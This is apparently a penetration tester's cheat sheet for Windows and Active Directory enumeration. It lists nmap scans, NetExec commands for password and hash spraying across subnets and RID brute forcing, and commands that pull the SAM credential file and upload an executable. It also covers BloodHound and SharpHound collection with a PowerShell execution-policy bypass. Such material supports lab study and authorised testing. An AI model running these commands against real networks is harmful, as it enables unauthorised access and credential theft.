Tips

Tools


Enumeration

Host Discovery

Port Scanning

Nmap

nmap $IP -Pn -n --open --min-rate 3000 -p-
nmap $IP -sC -sV -p [ports]
nmap $IP -sU --top-ports 10

NetExec

nxc smb $IP -u [user] -p [password]
nxc smb $IP -u [user] -p [password] --users
nxc smb $IP -u [user] -p [password] --groups
nxc smb $IP -u [user] -p [password] --shares
nxc smb $IP -u [user] -p [password] --rid-brute
nxc smb $IP -u [user] -p [password] --rid-brute | grep SidTypeUser
nxc smb $IP -u [user] -p [password] --continue-on-success
nxc smb $IP -u [user] -p [password] --local-auth

# Local Admin Spraying
nxc smb 172.16.5.0/24 -u [user] -p [password] --local-auth
nxc smb 172.16.5.0/24 -u [user] -H [hash] --local-auth

# logged-on-users
nxc smb 10.10.110.0/24 -u [user] -p [password] --logged-on-users

# Upload and download (the quoted Windows paths below show `\\\\`, which looks like an export artefact doubling the backslashes; check the escaping level against the tool's own documentation)
nxc mssql $IP -u [user] -p [password] --get-file 'C:\\\\Windows\\\\System32\\\\SAM' SAM
nxc mssql $IP -u [user] -p [password] --put-file gp.exe 'C:\\\\Users\\\\Public\\\\gp.exe'
nxc smb $IP -u [user] -p [password] --get-file 'C:\\\\Windows\\\\System32\\\\SAM' SAM
nxc smb $IP -u [user] -p [password] --put-file gp.exe 'C:\\\\Users\\\\Public\\\\gp.exe'

Kerbrute

Kerberos 88

Bloodhound

Collectors

# Linux
bloodhound-python -u [user] -p [pwd] -ns $DNS_IP -d [domain] -c All --zip
bloodhound-python -u [user] -p [pwd] -ns $DNS_IP -d [domain] -c DCOnly --zip

# Windows - SharpHound.exe
SharpHound.exe --CollectionMethods All --Domain [domain] --ExcludeDCs

# Windows - SharpHound.ps1
powershell -ep bypass
. .\\SharpHound.ps1
Invoke-Bloodhound -CollectionMethod All -Domain [domain] -ZipFileName [name]

Password Policy